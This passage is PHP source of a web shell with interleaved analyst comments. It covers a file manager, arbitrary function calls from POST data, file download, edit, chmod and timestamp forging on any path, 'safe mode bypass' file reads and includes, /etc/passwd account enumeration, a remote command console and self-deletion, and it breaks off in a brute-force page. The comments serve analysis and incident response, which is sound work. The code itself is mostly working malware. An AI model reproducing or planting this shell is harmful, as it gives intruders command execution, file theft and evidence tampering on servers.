   * client-supplied original filename, relative to cwd), mkdir (p2), delete
   * (recursive, over the f[] checkbox list), copy/move (stash the selection in
   * the session) and paste (replay it into the new cwd). It then renders a
   * sortable listing with per-entry links into the FilesTools action.
   * Helper functions (deleteDir, copy_paste, move_paste, cmp) are declared
   * conditionally inside the body, so a second call in the same request would
   * hit a redeclaration error.
   */
  495. function actionFilesMan() {
  496. printHeader();
  497. echo '<h1>File manager</h1><div class=content>';
  498. if(isset($_POST['p1'])) {
  499. switch($_POST['p1']) {
  // Destination name is whatever the client sent in the multipart filename.
  500. case 'uploadFile':
  501. if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
  502. echo "Can't upload file!";
  503. break;
  // Unreachable duplicate break.
  504. break;
  505. case 'mkdir':
  506. if(!@mkdir($_POST['p2']))
  507. echo "Can't create new dir";
  508. break;
  509. case 'delete':
  // Recursive delete; "." and ".." are skipped, symlinked dirs are followed by
  // filetype()'s answer (a "link" type falls through to unlink).
  510. function deleteDir($path) {
  511. $path = (substr($path,-1)=='/') ? $path:$path.'/';
  512. $dh = opendir($path);
  513. while ( ($item = readdir($dh) ) !== false) {
  514. $item = $path.$item;
  515. if ( (basename($item) == "..") || (basename($item) == ".") )
  516. continue;
  517. $type = filetype($item);
  518. if ($type == "dir")
  519. deleteDir($item);
  520. else
  521. @unlink($item);
  522. }
  523. closedir($dh);
  524. rmdir($path);
  525. }
  526. if(is_array(@$_POST['f']))
  527. foreach($_POST['f'] as $f) {
  528. $f = urldecode($f);
  529. if(is_dir($f))
  530. deleteDir($f);
  531. else
  532. @unlink($f);
  533. }
  534. break;
  535. case 'paste':
  536. if($_SESSION['act'] == 'copy') {
  // Recursive copy from $c.$s into $d.$s.
  537. function copy_paste($c,$s,$d){
  538. if(is_dir($c.$s)){
  539. mkdir($d.$s);
  540. $h = opendir($c.$s);
  541. while (($f = readdir($h)) !== false)
  542. if (($f != ".") and ($f != "..")) {
  543. copy_paste($c.$s.'/',$f, $d.$s.'/');
  544. }
  545. } elseif(is_file($c.$s)) {
  546. @copy($c.$s, $d.$s);
  547. }
  548. }
  549. foreach($_SESSION['f'] as $f)
  550. copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);
  551. } elseif($_SESSION['act'] == 'move') {
  // Declared but never called: this branch moves with @rename below, and the
  // body recurses into copy_paste, which is undefined in this branch.
  552. function move_paste($c,$s,$d){
  553. if(is_dir($c.$s)){
  554. mkdir($d.$s);
  555. $h = opendir($c.$s);
  556. while (($f = readdir($h)) !== false)
  557. if (($f != ".") and ($f != "..")) {
  558. copy_paste($c.$s.'/',$f, $d.$s.'/');
  559. }
  560. } elseif(is_file($c.$s)) {
  561. @copy($c.$s, $d.$s);
  562. }
  563. }
  564. foreach($_SESSION['f'] as $f)
  565. @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);
  566. }
  567. unset($_SESSION['f']);
  568. break;
  569. default:
  // copy / move: remember the selection and its source dir in the session.
  570. if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) {
  571. $_SESSION['act'] = @$_POST['p1'];
  572. $_SESSION['f'] = @$_POST['f'];
  573. foreach($_SESSION['f'] as $k => $f)
  574. $_SESSION['f'][$k] = urldecode($f);
  575. $_SESSION['cwd'] = @$_POST['c'];
  576. }
  577. break;
  578. }
  579. echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>';
  580. }
  581. $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
  582. if($dirContent === false) { echo 'Can\'t open this folder!'; return; }
  583. global $sort;
  584. $sort = array('name', 1);
  // Sort key/direction from p1 of the form s_<column>_<0|1>. In PCRE the class
  // [A-z] also covers the six punctuation characters between 'Z' and 'a'.
  585. if(!empty($_POST['p1'])) {
  586. if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
  587. $sort = array($match[1], (int)$match[2]);
  588. }
  589. ?>
  590. <script>
  591. function sa() {
  592. for(i=0;i<document.files.elements.length;i++)
  593. if(document.files.elements[i].type == 'checkbox')
  594. document.files.elements[i].checked = document.files.elements[0].checked;
  595. }
  596. </script>
  597. <table width='100%' class='main' cellspacing='0' cellpadding='2'>
  598. <form name=files method=post>
  599. <?php
  600. echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
  // Gather one record per entry; owner/group names fall back to numeric ids.
  601. $dirs = $files = $links = array();
  602. $n = count($dirContent);
  603. for($i=0;$i<$n;$i++) {
  604. $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
  605. $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
  606. $tmp = array('name' => $dirContent[$i],
  607. 'path' => $GLOBALS['cwd'].$dirContent[$i],
  608. 'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
  609. 'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
  610. 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
  611. 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
  612. 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
  613. );
  614. if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
  615. $files[] = array_merge($tmp, array('type' => 'file'));
  616. elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
  617. $links[] = array_merge($tmp, array('type' => 'link'));
  618. elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))
  619. $dirs[] = array_merge($tmp, array('type' => 'dir'));
  620. }
  621. $GLOBALS['sort'] = $sort;
  // Comparator reads the sort spec from $GLOBALS; the size branch never
  // returns 0 for equal sizes.
  622. function cmp($a, $b) {
  623. if($GLOBALS['sort'][0] != 'size')
  624. return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
  625. else
  626. return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
  627. }
  628. usort($files, "cmp");
  629. usort($dirs, "cmp");
  630. usort($links, "cmp");
  631. $files = array_merge($dirs, $links, $files);
  632. $l = 0;
  // Rows: only the display name is HTML-escaped; $f['path'] goes into the
  // directory onclick handler raw.
  633. foreach($files as $f) {
  634. echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
  635. .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
  636. $l = $l?0:1;
  637. }
  638. ?>
  639. <tr><td colspan=7>
  640. <input type=hidden name=a value='FilesMan'>
  641. <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'>
  642. <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'>
  643. <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option><?php if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){?><option value='paste'>Paste</option><?php }?></select>&nbsp;<input type="submit" value=">>"></td></tr>
  644. </form></table></div>
  645. <?php
  646. printFooter();
  647. }
  648. function actionStringTools() {
// Analyst note: "String conversions" page of the shell. It offers a menu of
// encode/decode/hash helpers, but the dispatch below calls WHATEVER function
// name arrives in POST p1 with POST p2 as its single argument -- the only
// gate is function_exists(). The menu is cosmetic; any one-argument PHP
// function can be invoked this way.
// Polyfills for the helpers that are not PHP builtins. Note the hex2bin
// fallback is not the PHP >= 5.4 builtin (hex string -> raw bytes); it
// returns a string of binary digits, so "HEX to BIN" differs by PHP version.
// ascii2hex/full_urlencode use dechex() without zero padding, so bytes below
// 0x10 come out as a single hex digit.
  649. if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
  650. if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
  651. if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= dechex(ord($p[$i]));return strtoupper($r);}}
  652. if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
// AJAX variant: remembers the checkbox state in the session (key derived
// from md5(HTTP_HOST), like the login flag), runs the function and answers
// with "<decimal byte length>\n<JS snippet>" that writes the escaped result
// into #strOutput. That length-prefixed JS body is a distinctive response
// shape for log/WAF matching.
  653. if(isset($_POST['ajax'])) {
  654. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
  655. ob_start();
  656. if(function_exists($_POST['p1']))
  657. echo $_POST['p1']($_POST['p2']);
  658. $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
  659. echo strlen($temp), "\n", $temp;
  660. exit;
  661. }
  662. printHeader();
  663. echo '<h1>String conversions</h1><div class=content>';
// Label => function-name table used to build the <select>; the value
// submitted back is the function name itself (see p1 handling above).
  664. $stringTools = array(
  665. 'Base64 encode' => 'base64_encode',
  666. 'Base64 decode' => 'base64_decode',
  667. 'Url encode' => 'urlencode',
  668. 'Url decode' => 'urldecode',
  669. 'Full urlencode' => 'full_urlencode',
  670. 'md5 hash' => 'md5',
  671. 'sha1 hash' => 'sha1',
  672. 'crypt' => 'crypt',
  673. 'CRC32' => 'crc32',
  674. 'ASCII to HEX' => 'ascii2hex',
  675. 'HEX to ASCII' => 'hex2ascii',
  676. 'HEX to DEC' => 'hexdec',
  677. 'HEX to BIN' => 'hex2bin',
  678. 'DEC to HEX' => 'dechex',
  679. 'DEC to BIN' => 'decbin',
  680. 'BIN to HEX' => 'bin2hex',
  681. 'BIN to DEC' => 'bindec',
  682. 'String to lower case' => 'strtolower',
  683. 'String to upper case' => 'strtoupper',
  684. 'Htmlspecialchars' => 'htmlspecialchars',
  685. 'String length' => 'strlen',
  686. );
// A non-AJAX submission clears the remembered AJAX preference.
  687. if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  688. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
  689. echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
  690. foreach($stringTools as $k => $v)
  691. echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
  692. echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX
  693. <textarea name='input' style='margin-top:5px' class=bigarea>".htmlspecialchars(@$_POST['p2'])."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
// Non-AJAX path: same p1(p2) call, result HTML-escaped into the <pre>.
  694. if(!empty($_POST['p1'])) {
  695. if(function_exists($_POST['p1']))
  696. echo htmlspecialchars($_POST['p1']($_POST['p2']));
  697. }
  698. echo"</pre></div>";
// The "Search for hash" form below is purely client-side: the operator's
// browser posts the hash to third-party lookup sites (target=_blank); the
// server itself makes no outbound request here.
  699. ?>
  700. <h1>Search for hash:</h1><div class=content>
  701. <form method='post' target='_blank' name="hf">
  702. <input type="text" name="hash" style="width:200px;">
  703. <input type="button" value="hashcrack.com" onclick="document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()">
  704. <input type="button" value="milw0rm.com" onclick="document.hf.action='http://www.milw0rm.com/cracker/search.php';document.hf.submit()">
  705. <input type="button" value="hashcracking.info" onclick="document.hf.action='https://hashcracking.info/index.php';document.hf.submit()">
  706. <input type="button" value="md5.rednoize.com" onclick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()">
  707. <input type="button" value="md5decrypter.com" onclick="document.hf.action='http://www.md5decrypter.com/';document.hf.submit()">
  708. </form>
  709. </div>
  710. <?php
  711. printFooter();
  712. }
  713. function actionFilesTools() {
// Analyst note: "File tools" page. POST p1 is the target path (URL-decoded
// here), p2 the sub-action (download/mkfile/view/highlight/chmod/edit/
// hexdump/rename/touch) and p3 that sub-action's value. Nothing in this
// function constrains p1: any path the PHP process can reach is operated on.
  714. if( isset($_POST['p1']) )
  715. $_POST['p1'] = urldecode($_POST['p1']);
// 'download' streams the raw file as an attachment (gzip output buffer)
// and exits before any HTML is rendered. The is_dir branch is empty, so
// directories are silently ignored.
  716. if(@$_POST['p2']=='download') {
  717. if(is_file($_POST['p1']) && is_readable($_POST['p1'])) {
  718. ob_start("ob_gzhandler", 4096);
  719. header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
  720. if (function_exists("mime_content_type")) {
  721. $type = @mime_content_type($_POST['p1']);
  722. header("Content-Type: ".$type);
  723. }
  724. $fp = @fopen($_POST['p1'], "r");
  725. if($fp) {
  726. while(!@feof($fp))
  727. echo @fread($fp, 1024);
  728. fclose($fp);
  729. }
  730. } elseif(is_dir($_POST['p1']) && is_readable($_POST['p1'])) {
  731. }
  732. exit;
  733. }
// 'mkfile' creates an empty file at p1 (only if nothing exists there) and
// then switches to the 'edit' view so content can be written into it.
  734. if( @$_POST['p2'] == 'mkfile' ) {
  735. if(!file_exists($_POST['p1'])) {
  736. $fp = @fopen($_POST['p1'], 'w');
  737. if($fp) {
  738. $_POST['p2'] = "edit";
  739. fclose($fp);
  740. }
  741. }
  742. }
  743. printHeader();
  744. echo '<h1>File tools</h1><div class=content>';
  745. if( !file_exists(@$_POST['p1']) ) {
  746. echo 'File not exists';
  747. printFooter();
  748. return;
  749. }
// Owner/group lookup. Both calls are fed fileowner(); the group line
// presumably meant filegroup() -- left as-is, it merely mislabels the group.
// viewSize()/viewPermsColor() are helpers defined elsewhere in the file.
  750. $uid = @posix_getpwuid(@fileowner($_POST['p1']));
  751. $gid = @posix_getgrgid(@fileowner($_POST['p1']));
  752. echo '<span>Name:</span> '.htmlspecialchars($_POST['p1']).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'
  753. ';
// "Create time" is filectime(), i.e. the inode change time, not creation.
  754. echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'
  755. ';
  756. if( empty($_POST['p2']) )
  757. $_POST['p2'] = 'view';
// Sub-action menu; directories only get Chmod/Rename/Touch.
  758. if( is_file($_POST['p1']) )
  759. $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
  760. else
  761. $m = array('Chmod', 'Rename', 'Touch');
  762. foreach($m as $v)
  763. echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
  764. echo '
  765. ';
  766. switch($_POST['p2']) {
  767. case 'view':
// Dump the file HTML-escaped, 1 KiB at a time.
  768. echo '<pre class=ml1>';
  769. $fp = @fopen($_POST['p1'], 'r');
  770. if($fp) {
  771. while( !@feof($fp) )
  772. echo htmlspecialchars(@fread($fp, 1024));
  773. @fclose($fp);
  774. }
  775. echo '</pre>';
  776. break;
  777. case 'highlight':
// Syntax-highlighted source via highlight_file(); <span> swapped for
// <font> so the page's own styling does not interfere.
  778. if( is_readable($_POST['p1']) ) {
  779. echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
  780. $code = highlight_file($_POST['p1'],true);
  781. echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
  782. }
  783. break;
  784. case 'chmod':
// p3 is an octal digit string (e.g. "0755"); it is converted to an int by
// hand, then applied with chmod(). On success a JS redirect reloads the view.
  785. if( !empty($_POST['p3']) ) {
  786. $perms = 0;
  787. for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
  788. $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
  789. if(!@chmod($_POST['p1'], $perms))
  790. echo 'Can\'t set permissions!
  791. <script>document.mf.p3.value="";</script>';
  792. else
  793. die('<script>g(null,null,null,null,"")</script>');
  794. }
  795. echo '<form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
  796. break;
  797. case 'edit':
// p3, when present, replaces the whole file via file_put_contents(); the
// current content is then re-read into the textarea.
  798. if( !is_writable($_POST['p1'])) {
  799. echo 'File isn\'t writeable';
  800. break;
  801. }
  802. if( !empty($_POST['p3']) ) {
  803. @file_put_contents($_POST['p1'],$_POST['p3']);
  804. echo 'Saved!
  805. <script>document.mf.p3.value="";</script>';
  806. }
  807. echo '<form onsubmit="g(null,null,null,null,this.text.value);return false;"><textarea name=text class=bigarea>';
  808. $fp = @fopen($_POST['p1'], 'r');
  809. if($fp) {
  810. while( !@feof($fp) )
  811. echo htmlspecialchars(@fread($fp, 1024));
  812. @fclose($fp);
  813. }
  814. echo '</textarea><input type=submit value=">>"></form>';
  815. break;
  816. case 'hexdump':
// Three columns -- offsets ($h[0]), hex bytes ($h[1]) and printable text
// ($h[2], with NUL/TAB/LF/CR shown as spaces) -- 32 bytes per row. The
// whole file is read into memory first.
  817. $c = @file_get_contents($_POST['p1']);
  818. $n = 0;
  819. $h = array('00000000
  820. ','','');
  821. $len = strlen($c);
  822. for ($i=0; $i<$len; ++$i) {
  823. $h[1] .= sprintf('%02X',ord($c[$i])).' ';
  824. switch ( ord($c[$i]) ) {
  825. case 0: $h[2] .= ' '; break;
  826. case 9: $h[2] .= ' '; break;
  827. case 10: $h[2] .= ' '; break;
  828. case 13: $h[2] .= ' '; break;
  829. default: $h[2] .= $c[$i]; break;
  830. }
  831. $n++;
  832. if ($n == 32) {
  833. $n = 0;
  834. if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'
  835. ';}
  836. $h[1] .= '
  837. ';
  838. $h[2] .= "\n";
  839. }
  840. }
  841. echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
  842. break;
  843. case 'rename':
// rename() p1 -> p3, then a JS redirect to the new name on success.
  844. if( !empty($_POST['p3']) ) {
  845. if(!@rename($_POST['p1'], $_POST['p3']))
  846. echo 'Can\'t rename!
  847. <script>document.mf.p3.value="";</script>';
  848. else
  849. die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
  850. }
  851. echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
  852. break;
  853. case 'touch':
// Sets both mtime and atime of p1 to the strtotime() value of p3.
// Forensics note: mtime/atime on a host running this shell may have been
// rewritten at will; touch() cannot set ctime, so prefer ctime and server
// logs when building a timeline.
  854. if( !empty($_POST['p3']) ) {
  855. $time = strtotime($_POST['p3']);
  856. if($time) {
  857. if(@touch($_POST['p1'],$time,$time))
  858. die('<script>g(null,null,null,null,"")</script>');
  859. else {
  860. echo 'Fail!<script>document.mf.p3.value="";</script>';
  861. }
  862. } else echo 'Bad time format!<script>document.mf.p3.value="";</script>';
  863. }
  864. echo '<form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
  865. break;
// 'mkfile' is handled above (it rewrites p2 to 'edit' on success); this
// case only covers the failure path, which renders nothing extra.
  866. case 'mkfile':
  867. break;
  868. }
  869. echo '</div>';
  870. printFooter();
  871. }
  872. function actionSafeMode() {
// Analyst note: "Safe mode bypass" page. POST p1 selects one of six
// techniques that read (or, for case 4, include) the path/spec given in p2;
// their output is captured with ob_start()/ob_get_clean() and echoed at the
// bottom of the page. The functions and wrappers used here (compress.zlib://,
// curl file://, ini_restore, posix_getpwuid, imap_open) are the reason
// hardening guides list them under disable_functions / allow_url_* limits.
  873. $temp='';
  874. ob_start();
  875. switch($_POST['p1']) {
  876. case 1:
// Copies p2 through the compress.zlib:// stream wrapper into a temp file and
// prints it. $test is never assigned in this function (as far as visible),
// so tempnam() receives an empty directory -- presumably falling back to
// the system temp dir.
  877. $temp=@tempnam($test, 'cx');
  878. if(@copy("compress.zlib://".$_POST['p2'], $temp)){
  879. echo @file_get_contents($temp);
  880. unlink($temp);
  881. } else
  882. echo 'Sorry... Can\'t open file';
  883. break;
  884. case 2:
// Directory listing: every glob() match for "p2*" is printed, one per line.
  885. $files = glob($_POST['p2'].'*');
  886. if( is_array($files) )
  887. foreach ($files as $filename)
  888. echo $filename."\n";
  889. break;
  890. case 3:
// curl over file:// with p2, a NUL byte and this script's own path
// (SELF_PATH) appended; curl_exec() output goes straight to the buffer.
  891. $ch = curl_init("file://".$_POST['p2']."\x00".SELF_PATH);
  892. curl_exec($ch);
  893. break;
  894. case 4:
// Not merely a read: after ini_restore() on safe_mode/open_basedir, p2 is
// include()d, so a PHP file at that path is executed in this process.
  895. ini_restore("safe_mode");
  896. ini_restore("open_basedir");
  897. include($_POST['p2']);
  898. break;
  899. case 5:
// Account enumeration: posix_getpwuid() for every uid from p2 to p3 (the
// POST strings are used as numbers without casting), printed colon-joined.
  900. for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
  901. $uid = @posix_getpwuid($_POST['p2']);
  902. if ($uid)
  903. echo join(':',$uid)."\n";
  904. }
  905. break;
  906. case 6:
// Opens p2 as an IMAP mailbox spec with empty credentials and prints the
// body of message 1.
  907. if(!function_exists('imap_open'))break;
  908. $stream = imap_open($_POST['p2'], "", "");
  909. if ($stream == FALSE)
  910. break;
  911. echo imap_body($stream, 1);
  912. imap_close($stream);
  913. break;
  914. }
// Captured output is inserted into the page below without htmlspecialchars().
  915. $temp = ob_get_clean();
  916. printHeader();
  917. echo '<h1>Safe mode bypass</h1><div class=content>';
  918. echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>
  919. <span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>
  920. <span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>
  921. <span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>
  922. <span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>
  923. <span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>';
  924. if($temp)
  925. echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>';
  926. echo '</div>';
  927. printFooter();
  928. }
  929. function actionConsole() {
// Analyst note: "Console" page. The command line arrives in POST p1 and is
// handed to ex(), which is defined elsewhere in the file (not in this view;
// presumably the shell's command-execution helper).
  930. if(isset($_POST['ajax'])) {
// AJAX variant: remembers the checkbox state in the session and answers with
// "<decimal byte length>\n<JS>"; the JS appends "$ cmd\n<output>" -- re-encoded
// from the POSTed charset to UTF-8 via iconv() -- to the output textarea.
  931. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
  932. ob_start();
  933. echo "document.cf.cmd.value='';\n";
  934. $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'\0"));
// A trailing "cd <dir>" in the command line also chdir()s the PHP process
// and pushes the new cwd into the main form, so the shell's working
// directory follows the console.
  935. if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
  936. if(@chdir($match[1])) {
  937. $GLOBALS['cwd'] = @getcwd();
  938. echo "document.mf.c.value='".$GLOBALS['cwd']."';";
  939. }
  940. }
  941. echo "document.cf.output.value+='".$temp."';";
  942. echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;";
  943. $temp = ob_get_clean();
  944. echo strlen($temp), "\n", $temp;
  945. exit;
  946. }
  947. printHeader();
  948. ?>
  949. <script>
  950. if(window.Event) window.captureEvents(Event.KEYDOWN);
  951. var cmds = new Array("");
  952. var cur = 0;
  953. function kp(e) {
  954. var n = (window.Event) ? e.which : e.keyCode;
  955. if(n == 38) {
  956. cur--;
  957. if(cur>=0)
  958. document.cf.cmd.value = cmds[cur];
  959. else
  960. cur++;
  961. } else if(n == 40) {
  962. cur++;
  963. if(cur < cmds.length)
  964. document.cf.cmd.value = cmds[cur];
  965. else
  966. cur--;
  967. }
  968. }
  969. function add(cmd) {
  970. cmds.pop();
  971. cmds.push(cmd);
  972. cmds.push("");
  973. cur = cmds.length-1;
  974. }
  975. </script>
  976. <?php
  977. echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>';
// Alias dropdown built from $GLOBALS['aliases'] (defined elsewhere);
// entries with an empty value are rendered as group labels.
  978. foreach($GLOBALS['aliases'] as $n => $v) {
  979. if($v == '') {
  980. echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
  981. continue;
  982. }
  983. echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
  984. }
// A non-AJAX submission clears the remembered AJAX preference.
  985. if(empty($_POST['ajax'])&&!empty($_POST['p1']))
  986. $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
  987. echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX
  988. <textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
// Non-AJAX path: run the command now and place the escaped transcript in
// the textarea.
  989. if(!empty($_POST['p1'])) {
  990. echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
  991. }
  992. echo '</textarea><input type=text name=cmd style="border-top:0;width:100%;margin:0;" onkeydown="kp(event);">';
  993. echo '</form></div><script>document.cf.cmd.focus();</script>';
  994. printFooter();
  995. }
  996. function actionLogout() {
// Drops the session flag that marks this HTTP_HOST as authenticated (the
// same md5(HTTP_HOST) key the login check sets) and prints 'bye!'.
  997. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  998. echo 'bye!';
  999. }
 1000. function actionSelfRemove() {
// "Suicide" page: when POST p1 == 'yes' the script unlink()s SELF_PATH
// (its own file) and stops. IR note: the shell can erase itself on a single
// request, so capture a copy and hash of the file before interacting with
// it. $_POST['p1'] is read without isset(); the resulting notice is hidden
// by the file-wide error_reporting(0).
 1001. printHeader();
 1002. if($_POST['p1'] == 'yes') {
 1003. if(@unlink(SELF_PATH))
 1004. die('Shell has been removed');
 1005. else
 1006. echo 'unlink error!';
 1007. }
 1008. echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?
 1009. <a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
 1010. printFooter();
 1011. }
  1012. function actionBruteforce() {
  1013. printHeader();
  1014. if( isset($_POST['proto']) ) {
  1015. echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'
  1016. ';
